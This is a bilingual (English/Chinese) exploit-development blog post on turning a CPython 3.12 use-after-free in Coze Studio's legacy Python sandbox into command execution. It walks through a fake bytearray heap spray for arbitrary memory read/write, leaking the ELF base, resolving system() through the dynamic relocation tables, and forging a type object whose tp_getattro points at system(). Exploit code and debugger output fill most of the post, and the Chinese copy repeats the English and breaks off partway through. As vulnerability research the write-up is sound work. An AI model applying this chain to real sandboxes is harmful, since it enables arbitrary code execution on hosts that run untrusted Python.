CPython UAF: Exploit Chain Dev from UAF Trigger to RCE (EN/中文)
Building a full interpreter-level exploit chain from a CPython use-after-free to remote code execution, with pwndbg output at each step.
EN
Author: Ivan
Recently, I discovered and exploited a CPython use-after-free vulnerability inside coze-studio's legacy Python sandbox, building an interpreter-level exploit chain from memory corruption to code execution.
In this blog, I break down each step after triggering the UAF, accompanied by real debugging output in pwndbg.
Environment: Ubuntu 24.04 x86_64 · python3-dbg 3.12.3 · gdb 15 + pwndbg
The root cause of the vulnerability is covered in a separate article. This article assumes the following prerequisites: the re-entrant lifetime mismatch has been triggered, the UAF conditions are met, and we are entering the exploitation development phase.
Overview: Exploit Chain Structure
flowchart LR
UAF --> Primitive --> Leak --> Resolve --> Hijack --> Exec
UAF[Use After Free]
Primitive[Arbitrary Memory Access]
Leak[Binary Base Disclosure]
Resolve[Dynamic Symbol Resolution]
Hijack[Function Pointer Hijack]
Exec[Interpreter Mediated Code Execution]
Step 1: PyByteArrayObject internal structure + fake_ba heap spray
Structure Layout (CPython 3.12)
The bytearray object header at the C layer is PyByteArrayObject. It starts with PyObject_VAR_HEAD (three fields: ob_refcnt / ob_type / ob_size), followed by its own fields:
offset field description
+0x00 ob_refcnt reference count
+0x08 ob_type points to the bytearray type object
+0x10 ob_size logical length (Py_SIZE)
+0x18 ob_alloc physical allocated capacity
+0x20 ob_bytes char*, the physical backing buffer
+0x28 ob_start char*, logical start of the data inside ob_bytes (normally equal to ob_bytes)
+0x30 ob_exports number of active buffer exports (usually 0)
The critical fields are the two buffer pointers. When bytearray_subscript performs index access, it reads ob_start[index], and ob_start normally points into the buffer held by ob_bytes. If we set both pointers to NULL (0), then buf[addr] becomes *(0 + addr), enabling direct read/write access to the virtual address addr in the interpreter's address space.
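The offsets can be double-checked without touching any live object. The following is a minimal sketch, assuming a 64-bit default (non-free-threaded) build and the field order declared in CPython 3.12's bytearrayobject.h; the class name PyByteArrayHeader and the helper field_offsets are hypothetical and exist only for this illustration.

```python
import ctypes

class PyByteArrayHeader(ctypes.Structure):
    """Illustrative mirror of the PyByteArrayObject field order (assumption: 3.12)."""
    _fields_ = [
        ("ob_refcnt", ctypes.c_ssize_t),   # PyObject_VAR_HEAD
        ("ob_type", ctypes.c_void_p),
        ("ob_size", ctypes.c_ssize_t),
        ("ob_alloc", ctypes.c_ssize_t),    # bytearray-specific fields
        ("ob_bytes", ctypes.c_void_p),
        ("ob_start", ctypes.c_void_p),
        ("ob_exports", ctypes.c_ssize_t),
    ]

def field_offsets(struct_type):
    """Return {field name: byte offset} for a ctypes.Structure subclass."""
    return {name: getattr(struct_type, name).offset
            for name, _ in struct_type._fields_}

offsets = field_offsets(PyByteArrayHeader)
for name, off in offsets.items():
    print(f"+0x{off:02x} {name}")
```

This only describes the layout; it does not read or modify any interpreter memory.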
fake_ba construction
The layout of fake_ba in the exploit (exactly corresponding to the fields above):
fake_ba = (
p64(0x123456) + # +0x00 ob_refcnt = fake
p64(id(bytearray)) + # +0x08 ob_type = real bytearray type
p64(2**63 - 1) + # +0x10 ob_size = MAX
p64(2**63 - 1) + # +0x18 ob_alloc = MAX
p64(0) * 3 # +0x20.. ob_bytes = 0, ob_start = 0
)
The heap spray writes this template into the freed chunk. Python then hands this memory out as a bytearray object: the very object captured by default_handler in the exploit (referred to as mem below).
I simulated this injection process in pwndbg using ctypes, pausing at BP1 (pre-injection) and BP2 (post-injection) to directly inspect PyByteArrayObject's memory:
[Stage 1] PyByteArrayObject @ 0x7ffff74e3fb0
================================================================
BEFORE corruption:
+0x00 ob_refcnt = 0x0000000000000001 (1)
+0x08 ob_type = 0x0000000000a8cd80
+0x10 ob_size = 0x0000000000000100 (256 = logical len)
+0x18 ob_alloc = 0x0000000000000101 (257 = capacity)
+0x20 (internal) = 0x00007ffff760b880
+0x28 ob_bytes = 0x00007ffff760b880 (data buffer ptr)
+0x30 ob_start = 0x0000000000000000
AFTER corruption (fake_ba sprayed into freed slot):
+0x00 ob_refcnt = 0x0000000000123456 (fake — no GC)
+0x10 ob_size = 0x7fffffffffffffff (= 2^63-1, all bounds pass)
+0x18 ob_alloc = 0x7fffffffffffffff (= 2^63-1)
+0x28 ob_bytes = 0x0000000000000000 (NULL → buf[addr] = *(0+addr) = *addr)
len(buf) = 9223372036854775807 ← Python sees a 9223372036854775807-byte window
ob_size = 0x7fffffffffffffff: Python's len(buf) returns 2^63-1, so any non-negative index below that value passes the i >= Py_SIZE(self) bounds check. With the buffer pointers zeroed (the three qwords from +0x20 onward are all 0), bytearray_subscript computes 0 + addr = addr and accesses that virtual address directly.
pwndbg at BP2 (heap spray completed, paused at os.kill system call return point):
─────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────
RAX 0
RBX 5
RCX 0x7ffff7c4553b (kill+11) ◂— cmp rax, -0xfff
RDI 0x11c82
RSI 5
R15 0x6a8bcf (os_kill) ◂— endbr64
RIP 0x7ffff7c4553b (kill+11) ◂— cmp rax, -0xfff
──────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────
► 0x7ffff7c4553b <kill+11> cmp rax, -0xfff
0x7ffff7c45543 <kill+19> ret
↓
0x6a8ba2 <os_kill_impl+52> cmp eax, -1
─────────────────────────────────[ BACKTRACE ]──────────────────────────────────
► 0 0x7ffff7c4553b kill+11
1 0x6a8ba2 os_kill_impl+52
2 0x6a8c0f os_kill+64
3 0x4ff074 cfunction_vectorcall_FASTCALL+103
4 0x5aa892 _PyEval_EvalFrameDefault+56003
Step 2: Arbitrary read/write primitive
After the window opens, the r64/w64 implementation is straightforward:
r64 = lambda addr: int.from_bytes(bytes(mem[addr + i] for i in range(8)), 'little')
w64 = lambda addr, val: [mem.__setitem__(addr + i, (val >> 8*i) & 0xff) for i in range(8)]
read = lambda addr, sz: bytes(mem[addr + i] for i in range(sz))
mem[addr] calls bytearray_subscript, which at the C layer reduces to *(buffer pointer + addr) = *(0 + addr) = *(addr). The write path mem.__setitem__(addr, byte) goes through bytearray_ass_subscript and likewise writes directly to address addr.
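The byte-wise little-endian composition used by these helpers can be checked offline. This is a minimal sketch in which mem is an ordinary, bounds-checked 64-byte bytearray standing in for the window (an assumption made purely for illustration); r32 is written here as the 4-byte counterpart of r64.

```python
import struct

# Ordinary bytearray used as a stand-in buffer; indices are offsets into it.
mem = bytearray(64)

def r64(addr):
    """Read 8 bytes at addr and combine them little-endian."""
    return int.from_bytes(bytes(mem[addr + i] for i in range(8)), "little")

def r32(addr):
    """Read 4 bytes at addr and combine them little-endian."""
    return int.from_bytes(bytes(mem[addr + i] for i in range(4)), "little")

def w64(addr, val):
    """Write val at addr one byte at a time, least significant byte first."""
    for i in range(8):
        mem[addr + i] = (val >> (8 * i)) & 0xFF

w64(16, 0xDEADBEEFCAFEBABE)
round_trip = r64(16)
reference = struct.unpack_from("<Q", mem, 16)[0]  # independent decode path
print(hex(round_trip), mem[16:24].hex())
```

Comparing r64 against struct.unpack_from plays the same role as the ctypes cross-check in the canary test: two independent decode paths must agree.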
Canary Round-Trip Verification
Canary write test in pwndbg:
[Stage 2] Arb R/W self-consistency
================================================================
target: canary_holder @ 0x7ffff74e3ec0
r64(0x7ffff74e3ec0) BEFORE write = 0x0000000000000001
ctypes direct BEFORE write = 0x0000000000000001
w64(0x7ffff74e3ec0, 0xdeadbeefcafebabe)
r64(0x7ffff74e3ec0) AFTER write = 0xdeadbeefcafebabe
ctypes direct AFTER write = 0xdeadbeefcafebabe
[PASS] read-back == 0xdeadbeefcafebabe
Both paths (r64 via the mem window vs. ctypes direct mapping) read the same value, so the primitive passes verification.
Step 3: Leak ELF base address
Exploit the tp_dealloc pointer
id(int) returns the address of PyLong_Type in the static data segment. Within the PyTypeObject structure, tp_dealloc (the destructor pointer) resides at +0x30:
PyTypeObject offset layout:
+0x00 ob_refcnt
+0x08 ob_type
+0x10 ob_size
+0x18 tp_name (char*)
+0x20 tp_basicsize
+0x28 tp_itemsize
+0x30 tp_dealloc <- points to a function inside the Python 3 binary
+0x38 tp_vectorcall_offset
...
+0x90 tp_getattro <- later hijack target
r64(id(int) + 0x30) reads PyLong_Type.tp_dealloc, a function pointer into the python3 ELF image. Page-align it (>> 12 << 12), then scan one page at a time toward lower addresses until the \x7fELF magic is found; that page is the ELF header, i.e. the image base.
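The alignment and backward scan can be exercised against a synthetic image. This is a sketch under stated assumptions: image is a plain bytearray pretending to be mapped at BASE, read is a hypothetical accessor over it, and max_pages is an illustrative safety bound that is not part of the original loop.

```python
PAGE = 0x1000

def page_align(addr):
    """Clear the low 12 bits, i.e. round down to a 4 KiB page boundary."""
    return (addr >> 12) << 12

def find_elf_base(read, start, max_pages=4096):
    """Walk downward page by page until the ELF magic is seen."""
    page = page_align(start)
    for _ in range(max_pages):
        if read(page, 4) == b"\x7fELF":
            return page
        page -= PAGE
    raise LookupError("no ELF magic found within max_pages")

# Synthetic 1 MiB image "mapped" at 0x400000 with the magic at its start.
BASE = 0x400000
image = bytearray(0x100 * PAGE)
image[0:4] = b"\x7fELF"

def read(addr, size):
    off = addr - BASE
    return bytes(image[off:off + size])

aligned = page_align(0x4E1D11)
base = find_elf_base(read, 0x4E1D11)
print(hex(aligned), hex(base))
```

The sample pointer 0x4e1d11 is the tp_dealloc value from the Stage 3 output, so the result matches the 0x4e1000 and 0x400000 figures shown there.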
leak = (r64(id(int) + 0x30) >> 12) << 12
while read(leak, 4) != b"\x7fELF":
    leak -= 0x1000
elf_base = leak
pwndbg:
[Stage 3] ELF base leak
================================================================
id(int) = PyLong_Type @ 0x9a0a20
r64(PyLong_Type + 0x30) = 0x4e1d11 (tp_dealloc)
page-aligned = 0x4e1000
ELF header @ 0x400000
magic = b'\x7fELF'
e_type = 0x0002 (2=ET_EXEC, 3=ET_DYN)
e_machine = 0x003e (62=EM_X86_64)
e_entry = 0x422066
e_phoff = 0x40 (14 entries × 56 bytes)
Step 4: Parse system() from .dynamic
The ELF header contains the program header table. Traverse the PHDRs to find an entry of type PT_DYNAMIC (2), whose p_vaddr points to the .dynamic section.
.dynamic contains a series of {d_tag, d_val} pairs (8 bytes per field, 16 bytes per entry), terminated by d_tag == 0 (DT_NULL). Four tags matter here:
| Tag | Value | Meaning |
|---|---|---|
| DT_JMPREL (23) | d_val | Start address of rela.plt (relocation table for imported functions) |
| DT_PLTRELSZ (2) | d_val | Total size of rela.plt in bytes |
| DT_SYMTAB (6) | d_val | Address of .dynsym (symbol table) |
| DT_STRTAB (5) | d_val | Address of .dynstr (symbol name string table) |
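Walking the tag list is a simple fixed-stride loop. The sketch below runs over a synthetic .dynamic blob built in place; the d_val numbers are copied from the Stage 4 output, while the DT_NEEDED filler entry and the function name parse_dynamic are assumptions for illustration.

```python
import struct

DT_NULL, DT_NEEDED, DT_PLTRELSZ, DT_STRTAB, DT_SYMTAB, DT_JMPREL = 0, 1, 2, 5, 6, 23
WANTED = {
    DT_PLTRELSZ: "pltrelsz",
    DT_STRTAB: "strtab",
    DT_SYMTAB: "symtab",
    DT_JMPREL: "jmprel",
}

def parse_dynamic(blob):
    """Collect the wanted d_val values; stop at the DT_NULL terminator."""
    found = {}
    # Elf64_Dyn: signed 8-byte d_tag followed by unsigned 8-byte d_val.
    for d_tag, d_val in struct.iter_unpack("<qQ", blob):
        if d_tag == DT_NULL:
            break
        if d_tag in WANTED:
            found[WANTED[d_tag]] = d_val
    return found

entries = [
    (DT_NEEDED, 0x1),            # filler entry that the parser should skip
    (DT_STRTAB, 0x410F28),
    (DT_SYMTAB, 0x403818),
    (DT_PLTRELSZ, 501 * 24),     # 501 Elf64_Rela entries of 24 bytes each
    (DT_JMPREL, 0x41C8D8),
    (DT_NULL, 0),
]
blob = b"".join(struct.pack("<qQ", tag, val) for tag, val in entries)
info = parse_dynamic(blob)
print({k: hex(v) for k, v in info.items()})
```

Dividing pltrelsz by 24 gives the entry count that bounds the relocation loop.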
Each Elf64_Rela entry occupies 24 bytes:
+0 r_offset (8) -> corresponding GOT slot address
+8 r_info (8) -> upper 32 bits: symbol table index; lower 32 bits: relocation type
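+16 r_addend (8)
Take the symbol name offset from .dynsym[sym_idx].st_name (each Elf64_Sym entry is 24 bytes, with the 4-byte st_name first), then read the string from .dynstr. Once "system" is found, read the GOT slot to obtain the runtime address of system() (assuming the entry has already been resolved). In the loop below, r32 is the 4-byte counterpart of r64.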
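The r_info split and the .dynsym to .dynstr indirection can be traced on synthetic tables. This is a sketch only: build_tables and find_got_slot are hypothetical helpers, the symbol names and the 0x1000-based slot addresses are made up, and relocation type 7 (R_X86_64_JUMP_SLOT) is assumed for every entry.

```python
import struct

RELA_SIZE = 24  # sizeof(Elf64_Rela)
SYM_SIZE = 24   # sizeof(Elf64_Sym)

def build_tables(names):
    """Build tiny rela.plt / .dynsym / .dynstr tables for the given names."""
    strtab = b"\x00"
    symtab = bytes(SYM_SIZE)  # index 0 is the reserved null symbol
    rela = b""
    for idx, name in enumerate(names, start=1):
        st_name = len(strtab)
        strtab += name + b"\x00"
        # Elf64_Sym: st_name(4) st_info(1) st_other(1) st_shndx(2) st_value(8) st_size(8)
        symtab += struct.pack("<IBBHQQ", st_name, 0x12, 0, 0, 0, 0)
        # Elf64_Rela: r_offset, r_info = (sym_idx << 32) | type, r_addend
        rela += struct.pack("<QQq", 0x1000 + 8 * idx, (idx << 32) | 7, 0)
    return rela, symtab, strtab

def find_got_slot(rela, symtab, strtab, wanted):
    """Return r_offset of the relocation whose symbol name equals wanted."""
    for off in range(0, len(rela), RELA_SIZE):
        r_offset, r_info, _addend = struct.unpack_from("<QQq", rela, off)
        sym_idx = r_info >> 32
        (st_name,) = struct.unpack_from("<I", symtab, sym_idx * SYM_SIZE)
        end = strtab.index(b"\x00", st_name)
        if strtab[st_name:end] == wanted:
            return r_offset
    return None

rela, symtab, strtab = build_tables([b"puts", b"system", b"exit"])
slot = find_got_slot(rela, symtab, strtab, b"system")
print(hex(slot))
```

In a real image the returned r_offset is the GOT slot address, and one further 8-byte read of that slot yields the resolved function pointer.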
for i in range(dt_pltrelsz // 24):
    rela = dt_jmprel + i * 24
    r_offset = r64(rela) # GOT slot address
    r_info = r64(rela + 8)
    sym_idx = r_info >> 32
    st_name = r32(dt_symtab + sym_idx * 24)
    name = read(dt_strtab + st_name, 32).split(b"\x00")[0]
    if name == b"system":
        system = r64(r_offset) # dereference GOT → real system() address
        break
pwndbg:
[Stage 4] Resolving system() via .dynamic
================================================================
PT_DYNAMIC: phdr[6] p_vaddr=0xa8add8 filesz=0x200
.dynamic resolved @ 0xa8add8
DT_JMPREL (rela.plt) = 0x41c8d8 (501 entries)
DT_SYMTAB = 0x403818
DT_STRTAB = 0x410f28
Found 'system' in rela.plt[106]:
r_offset (GOT entry addr) = 0xa8b350
sym_idx = 106
GOT[r_offset] (resolved addr)= 0x7ffff7c58750
first 8 bytes of system() = f30f1efa4885ff74
The leading bytes f3 0f 1e fa encode endbr64, the first instruction of libc's system() (CET-enabled build). 0x7ffff7c58750 is an address inside libc rather than a PLT stub, confirming that the GOT entry has already been resolved.
Step 5: Forge PyTypeObject
What is tp_getattro?
When Python executes obj.attr, the interpreter's execution path is:
LOAD_ATTR bytecode
-> _PyObject_GetMethod(obj, "attr")
-> PyObject_GetAttr(obj, name)
-> f = Py_TYPE(obj)->tp_getattro <- read func ptr of ob_type
-> f(obj, name) <- indirect call
tp_getattro is located at offset +0x90 within PyTypeObject (the 24 bytes of PyObject_VAR_HEAD, followed by the slots in declaration order). It is a getattrofunc pointer with the prototype:
typedef PyObject *(*getattrofunc)(PyObject *obj, PyObject *name);
If this pointer is replaced with system, the interpreter calls system(obj, name) on attribute access. Under the System V AMD64 calling convention the first argument is passed in RDI. Since system(const char *command) only reads RDI, the net effect is system(obj): it executes the string located at the address of obj.
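The +0x90 figure follows from counting 8-byte slots in declaration order. The sketch below lists the leading PyTypeObject members as declared in CPython 3.12 (assuming a 64-bit build where every listed member is 8 bytes wide); the names LEADING_FIELDS and WORD are illustrative.

```python
# Leading members of PyTypeObject in declaration order (CPython 3.12, 64-bit).
LEADING_FIELDS = [
    "ob_refcnt", "ob_type", "ob_size",            # PyObject_VAR_HEAD
    "tp_name", "tp_basicsize", "tp_itemsize",
    "tp_dealloc", "tp_vectorcall_offset",
    "tp_getattr", "tp_setattr", "tp_as_async", "tp_repr",
    "tp_as_number", "tp_as_sequence", "tp_as_mapping",
    "tp_hash", "tp_call", "tp_str", "tp_getattro",
]
WORD = 8  # each member above is a pointer or Py_ssize_t

offsets = {name: index * WORD for index, name in enumerate(LEADING_FIELDS)}
for name in ("tp_name", "tp_dealloc", "tp_vectorcall_offset", "tp_getattro"):
    print(f"+0x{offsets[name]:02x} {name}")
```

tp_getattro is the 19th member (index 18), and 18 × 8 = 0x90, which agrees with the layout table in Step 3.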
Constructing fake_type
fake_type = flat(
0x1000, # +0x00 ob_refcnt (high value to avoid GC)
id(type(int)), # +0x08 ob_type (metaclass, keep it "valid")
b"\x00" * 0x28, # +0x10 ~ +0x37 padding (covers ob_size / tp_name /
# tp_basicsize / tp_itemsize / tp_dealloc)
system, # +0x38 start placing system()
) + p64(system) * 52 # 52 more copies: 53 in total, ending at +0x38 + 53*8 = +0x1E0
# overwrite tp_getattro(+0x90) and all other slots
Keep these bytes in a bytes object so they stay alive, then compute fake_type_addr = id(bytes(fake_type)) + 32 (skipping the 32-byte PyBytesObject header to reach the content area).
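The size and slot arithmetic of this layout can be verified with inert placeholder values. In this sketch FILL and META are arbitrary constants standing in for the two addresses (assumptions, not real pointers), and struct.pack replaces the pwntools helpers.

```python
import struct

FILL = 0x4141414141414141  # placeholder for the repeated 8-byte slot value
META = 0x4242424242424242  # placeholder for the metaclass pointer

blob = (
    struct.pack("<QQ", 0x1000, META)  # +0x00 ob_refcnt, +0x08 ob_type
    + b"\x00" * 0x28                  # +0x10 .. +0x37 zero padding
    + struct.pack("<Q", FILL) * 53    # +0x38 .. +0x1DF, 53 identical slots
)

def slot(offset):
    """Return the little-endian qword stored at the given offset."""
    return struct.unpack_from("<Q", blob, offset)[0]

print(hex(len(blob)), hex(slot(0x30)), hex(slot(0x90)))
```

The blob is 0x1E0 bytes long, the qword at +0x30 stays zero, and +0x90 falls inside the filled region.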
pwndbg
[Stage 5] Fake PyTypeObject
================================================================
fake_type_bytes (PyBytesObject) @ 0xd8be40
content area (our fake type) @ 0xd8be60
int metaclass @ 0xaa6b60
Slot inspection (first 20 qwords from fake_type_addr):
+0x00: 0x0000000000001000 ← ob_refcnt
+0x08: 0x0000000000aa6b60 ← ob_type (metaclass)
+0x10: 0x0000000000000000
+0x18: 0x0000000000000000
+0x20: 0x0000000000000000
+0x28: 0x0000000000000000
+0x30: 0x0000000000000000
+0x38: 0x00007ffff7c58750 ← tp_vectorcall_offset (also system)
+0x40: 0x00007ffff7c58750 ← system() [+0x40]
+0x48: 0x00007ffff7c58750 ← system() [+0x48]
+0x50: 0x00007ffff7c58750 ← system() [+0x50]
+0x58: 0x00007ffff7c58750 ← system() [+0x58]
+0x60: 0x00007ffff7c58750 ← system() [+0x60]
+0x68: 0x00007ffff7c58750 ← system() [+0x68]
+0x70: 0x00007ffff7c58750 ← system() [+0x70]
+0x78: 0x00007ffff7c58750 ← system() [+0x78]
+0x80: 0x00007ffff7c58750 ← system() [+0x80]
+0x88: 0x00007ffff7c58750 ← system() [+0x88]
+0x90: 0x00007ffff7c58750 ← tp_getattro *** system() ***
+0x98: 0x00007ffff7c58750 ← system() [+0x98]
pwndbg's x/20gx fake_type_addr verification:
(gdb) x/20gx 0xd8be60
0xd8be60: 0x0000000000001000 0x0000000000aa6b60
0xd8be70: 0x0000000000000000 0x0000000000000000
0xd8be80: 0x0000000000000000 0x0000000000000000
0xd8be90: 0x0000000000000000 0x00007ffff7c58750
0xd8bea0: 0x00007ffff7c58750 0x00007ffff7c58750
0xd8beb0: 0x00007ffff7c58750 0x00007ffff7c58750
0xd8bec0: 0x00007ffff7c58750 0x00007ffff7c58750
0xd8bed0: 0x00007ffff7c58750 0x00007ffff7c58750
0xd8bee0: 0x00007ffff7c58750 0x00007ffff7c58750
0xd8bef0: 0x00007ffff7c58750 0x00007ffff7c58750
0xd8bef0 = 0xd8be60 + 0x90 is the tp_getattro slot, and it indeed holds 0x7ffff7c58750 = system().
Step 6: INCREF trick + fake_obj + RCE
Question: Where does the argument for system() come from?
When tp_getattro(obj, name) is called, obj resides in RDI. system(const char *command) receives RDI as the command string pointer. Thus system() executes the string at obj's address.
We need obj (fake_obj_addr) to point to a Python object containing shell commands, and this object must start with "id\x00..." (or other commands) in its C-layer header — specifically the first 8 bytes of the ob_refcnt field.
The ingenuity of the INCREF trick
Directly storing "id\x00..." as ob_refcnt causes issues: Python's BINARY_SUBSCR (list index access) executes Py_INCREF(item) before returning the element, incrementing ob_refcnt by 1.
Exploiting this behavior: store the command's first byte after decrementing it. The ASCII code for 'i' is 105; decrementing yields 104 = 'h'. After INCREF, 'h' → 'i', making the command valid.
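The byte-level effect of the increment is plain little-endian integer arithmetic. This minimal sketch treats the 8-byte field as an integer, adds one, and converts back; the variable names are illustrative, and the second case is included only to show the carry limitation.

```python
# The 8-byte field as stored before the subscript operation.
stored = b"hd" + b"\x00" * 6
refcnt = int.from_bytes(stored, "little")
after = (refcnt + 1).to_bytes(8, "little")
print(hex(refcnt), after)

# Carry case: a first byte of 0xff would overflow into the second byte,
# so the single-byte adjustment only works when no carry occurs.
carry_case = (int.from_bytes(b"\xffd" + b"\x00" * 6, "little") + 1).to_bytes(8, "little")
print(carry_case)
```

Because the least significant byte comes first in memory, adding one to the integer changes only the first character as long as that byte is below 0xff.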
# ob_refcnt initially b"hd\x00\x00\x00\x00\x00\x00" (= "id"[0]-1 + "d")
# BINARY_SUBSCR triggers Py_INCREF: ob_refcnt[0] from 0x68('h') to 0x69('i')
# system(fake_obj_addr) sees string: "id\x00..." = "id"
cmd = bytes([ord('i') - 1]) + b"d\x00\x00\x00\x00\x00\x00" # b"hd\x00..."
fake_obj = cmd + p64(fake_type_addr) + b"\x00" * 0x100
# [0..7] ob_refcnt = b"hd\x00..." <- After Py_INCREF, turns to b"id\x00..."
# [8..15] ob_type = fake_type_addr
# [16..] padding
Overwriting the ob_item pointer
Internal structure of list objects:
PyListObject:
+0x00 ob_refcnt
+0x08 ob_type
+0x10 ob_size (len(list))
+0x18 ob_item (PyObject **, point to payload array)
+0x20 allocated
r64(id(payload) + 0x18) reads ob_item (the address of the slot holding payload[0]), then w64(ob_item_addr, fake_obj_addr) redirects payload[0] to our fake_obj:
payload = [None]
w64(r64(id(payload) + 0x18), fake_obj_addr) # overwrite ob_item[0]
fake_obj before INCREF:
[Stage 6] INCREF trick + RCE
================================================================
fake_obj_bytes @ 0x7ffff74acac0
fake_obj_addr @ 0x7ffff74acae0
ob_refcnt bytes BEFORE INCREF:
raw : 6864000000000000 (b'hd\x00\x00\x00\x00\x00\x00')
[0] : 0x68 = ord('h') <- NOT 'i' yet
ob_type at +0x08:
r64(fake_obj_addr+0x08) = 0xd8be60 == fake_type_addr: True
After BINARY_SUBSCR Py_INCREF, ob_refcnt[0] += 1:
0x68 → 0x69 = ord('i') ← 'i' appears
system(fake_obj_addr) sees string: 'id'
pwndbg pauses at break PyObject_GetAttr (triggered by payload[0].pwned):
─────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────
*RDI 0x7ffff74acae0 ◂— 0x6469 /* 'id' */ ← fake_obj became 'id' after INCREF
*RSI 0x7ffff7505990 ◂— 0xffffffff ← PyUnicode "pwned"
RIP 0x504607 (PyObject_GetAttr) ◂— endbr64
──────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────
► 0x504607 <PyObject_GetAttr> endbr64
0x504616 <PyObject_GetAttr+15> mov r14, qword ptr [rdi + 8]
R14, [0x7ffff74acae8] => 0xd8be60 ◂— 0x1000
↑ reads ob_type = fake_type_addr
0x50461a <PyObject_GetAttr+19> mov rax, qword ptr [rsi + 8]
─────────────────────────────────[ BACKTRACE ]──────────────────────────────────
► 0 0x504607 PyObject_GetAttr
1 0x5a5e02 _PyEval_EvalFrameDefault+36915
2 0x5b0226 _PyEval_EvalFrame+29
In pwndbg, RDI = 0x7ffff74acae0. pwndbg auto-dereferences it and displays ◂— 0x6469 /* 'id' */, which is exactly the ob_refcnt value after INCREF: 0x6469 in little-endian is b"id".
Next, at PyObject_GetAttr+15, mov r14, [rdi+8] loads ob_type into R14 (= 0xd8be60 = fake_type_addr). Then at +50, call rax executes with RAX = fake_type->tp_getattro = 0x7ffff7c58750 = system().
GDB output confirms tp_getattro dereferencing and execution:
[pwndbg] Inside PyObject_GetAttr — about to dispatch via ob_type->tp_getattro:
fake_obj @ 0x7ffff74acae0
ob_type @ 0xd8be60 (our fake PyTypeObject)
tp_getattro (+0x90) = 0x7ffff7c58750 ← will be called as system(fake_obj)
*fake_obj (command) = b'id\x00\x00\x00\x00\x00\x00' ('id')
Raw memory of fake_obj (pwndbg x/4gx):
(gdb) x/4gx 0x7ffff74acae0
0x7ffff74acae0: 0x0000000000006469 0x0000000000d8be60
0x7ffff74acaf0: 0x0000000000000000 0x0000000000000000
0x6469 = little-endian b"id" ← INCREF modified the first byte
0xd8be60 = fake_type_addr ← ob_type points to our fake type object
Execution result:
uid=1000(ivan) gid=1000(ivan) groups=1000(ivan),27(sudo)
Wrap-up: Complete exploit flow review
From UAF trigger to command execution there is no shellcode and no ROP; the chain relies entirely on the interpreter's own C function pointer dispatch:
- fake_ba heap spray sets a bytearray's buffer pointer to NULL and ob_size to MAX → memory window opened
- r64/w64 enable arbitrary read/write via bytearray index access
- ELF base derived by tracing back from the PyLong_Type.tp_dealloc pointer
- system() resolved at runtime via the ELF's PT_DYNAMIC → rela.plt
- fake PyTypeObject sets tp_getattro to system()
- Overwrite ob_item to make payload[0] point to a fake Python object whose ob_refcnt stores the command string
- INCREF trick: exploits the automatic INCREF in Python's BINARY_SUBSCR to change the command's first byte from 'h' (0x68) to 'i' (0x69)
- payload[0].pwned triggers PyObject_GetAttr → tp_getattro(obj) → system("id")
(End)
CN
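Author: Ivan
While studying the legacy Python sandbox in Coze Studio, I recently found a CPython use-after-free vulnerability. Digging further, I eventually got the whole exploit chain, from memory corruption to code execution, running in a local environment.
This is the full version. I break down each step after the UAF trigger, accompanied by real debugging output from pwndbg.
Environment: Ubuntu 24.04 x86_64 · python3-dbg 3.12.3 · gdb 15 + pwndbg
The root cause of the vulnerability is covered in a separate article. This article assumes the following: the re-entrant lifetime mismatch has been triggered, the UAF conditions hold, and we are entering exploit development.
Overview: Chain Structure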
flowchart LR
UAF --> RW --> Leak --> Resolve --> Hijack --> Exec
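UAF[UAF Trigger]
RW[Arbitrary Read/Write]
Leak[Leak ELF]
Resolve[Resolve system]
Hijack[Hijack tp_getattro]
Exec[system Execution]
Step 1: PyByteArrayObject internal structure + fake_ba heap spray
Structure Layout (CPython 3.12)
The object header for bytearray at the C layer is PyByteArrayObject. It starts with PyObject_VAR_HEAD (three fields: ob_refcnt / ob_type / ob_size), followed by its own fields:
offset field description
+0x00 ob_refcnt reference count
+0x08 ob_type points to the bytearray type object
+0x10 ob_size logical length (Py_SIZE)
+0x18 ob_alloc physical allocated capacity
+0x20 ob_bytes char*, the physical backing buffer
+0x28 ob_start char*, logical start of the data inside ob_bytes (normally equal to ob_bytes)
+0x30 ob_exports number of active buffer exports (usually 0)
The key is the pair of buffer pointers. For index access, bytearray_subscript reads ob_start[index], and ob_start normally points into the buffer held by ob_bytes. If we set both pointers to NULL (0), buf[addr] becomes *(0 + addr), i.e. a direct read/write of the virtual address addr.
fake_ba construction
The layout of fake_ba in the exploit (matching the fields above exactly):
fake_ba = (
p64(0x123456) + # +0x00 ob_refcnt = fake value (keeps GC away)
p64(id(bytearray)) + # +0x08 ob_type = real bytearray type
p64(2**63 - 1) + # +0x10 ob_size = MAX (every index is valid)
p64(2**63 - 1) + # +0x18 ob_alloc = MAX
p64(0) * 3 # +0x20 ob_bytes = NULL, +0x28 ob_start = NULL, +0x30 ob_exports = 0
)
The heap spray writes this template into the freed chunk, after which Python hands this memory out as a bytearray object. That object is mem (the object captured by default_handler in the exploit).
I simulated this spray in pwndbg using ctypes, pausing at BP1 (before the spray) and BP2 (after the spray) to inspect the PyByteArrayObject memory directly: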
[Stage 1] PyByteArrayObject @ 0x7ffff74e3fb0
================================================================
BEFORE corruption:
+0x00 ob_refcnt = 0x0000000000000001 (1)
+0x08 ob_type = 0x0000000000a8cd80
+0x10 ob_size = 0x0000000000000100 (256 = logical len)
+0x18 ob_alloc = 0x0000000000000101 (257 = capacity)
+0x20 (internal) = 0x00007ffff760b880
+0x28 ob_bytes = 0x00007ffff760b880 (data buffer ptr)
+0x30 ob_start = 0x0000000000000000
AFTER corruption (fake_ba sprayed into freed slot):
+0x00 ob_refcnt = 0x0000000000123456 (fake — no GC)
+0x10 ob_size = 0x7fffffffffffffff (= 2^63-1, all bounds pass)
+0x18 ob_alloc = 0x7fffffffffffffff (= 2^63-1)
+0x28 ob_bytes = 0x0000000000000000 (NULL → buf[addr] = *(0+addr) = *addr)
len(buf) = 9223372036854775807 ← Python sees a 9223372036854775807-byte window
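ob_size = 0x7fffffffffffffff: Python's len(buf) returns 2^63-1, so any non-negative index below that value passes the i >= Py_SIZE(self) check. With the buffer pointers zeroed, bytearray_subscript computes 0 + addr = addr, which becomes a direct access to that virtual address.
pwndbg at BP2 (heap spray completed, paused at the return point of the os.kill system call):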
─────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────
RAX 0
RBX 5
RCX 0x7ffff7c4553b (kill+11) ◂— cmp rax, -0xfff
RDI 0x11c82
RSI 5
R15 0x6a8bcf (os_kill) ◂— endbr64
RIP 0x7ffff7c4553b (kill+11) ◂— cmp rax, -0xfff
